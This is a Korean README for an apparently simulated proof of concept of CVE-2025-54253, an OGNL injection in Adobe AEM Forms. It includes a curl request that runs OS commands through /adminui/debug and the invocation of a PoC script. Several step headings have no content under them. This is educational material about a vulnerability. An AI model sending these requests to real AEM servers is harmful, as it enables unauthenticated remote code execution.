
CVE-2025-54253 시뮬레이션 PoC: Adobe AEM OGNL 인젝션 취약점
CVE-2025-54253는 Adobe AEM Forms on JEE의 치명적인 OGNL 주입 취약점입니다. 이 취약점을 통해 인증되지 않은 공격자가 /adminui/debug?debug=OGNL: 엔드포인트를 통해 임의의 운영 체제 명령을 실행할 수 있습니다.
이 취약점은 사용자 제어 OGNL 표현식을 적절한 검증이나 인증 없이 평가하는 노출된 디버깅 인터페이스에 존재합니다. 이를 악용하면 애플리케이션 서버 컨텍스트에서 원격 코드 실행으로 이어질 수 있습니다.
📝 참고: 이 취약점은
/adminui/debug엔드포인트를 적절한 접근 제어 없이 공개적으로 또는 내부적으로 노출하는 설치 환경에 영향을 미칩니다.
간단한 OGNL 표현식은 브라우저나 curl을 통한 명령 실행을 보여줍니다.
curl "http://localhost:4502/adminui/debug?debug=OGNL:whoami"
python3 poc/cve-2025-54253-poc.py --url http://127.0.0.1:4502 --cmd "whoami"
이 스크립트는 명령 실행 출력을 exploit.log에 기록합니다:
취약한 Adobe AEM 인스턴스(<= 6.5.23.0)를 설정합니다.
Flask 서버를 시작합니다 (로컬에서 시뮬레이션하는 경우):

브라우저에서 OGNL을 실행합니다:

curl을 통해 실행합니다:

명령 출력 결과:



Flask 로깅 보기:

PoC 스크립트 실행:

상세 로그 보기:

/adminui/debug에 대한 접근 제한⚠️ 면책 조항:
이 PoC는 교육 목적으로만 제공됩니다. 소유하지 않았거나 명시적 테스트 허가를 받지 않은 시스템에 사용하지 마십시오.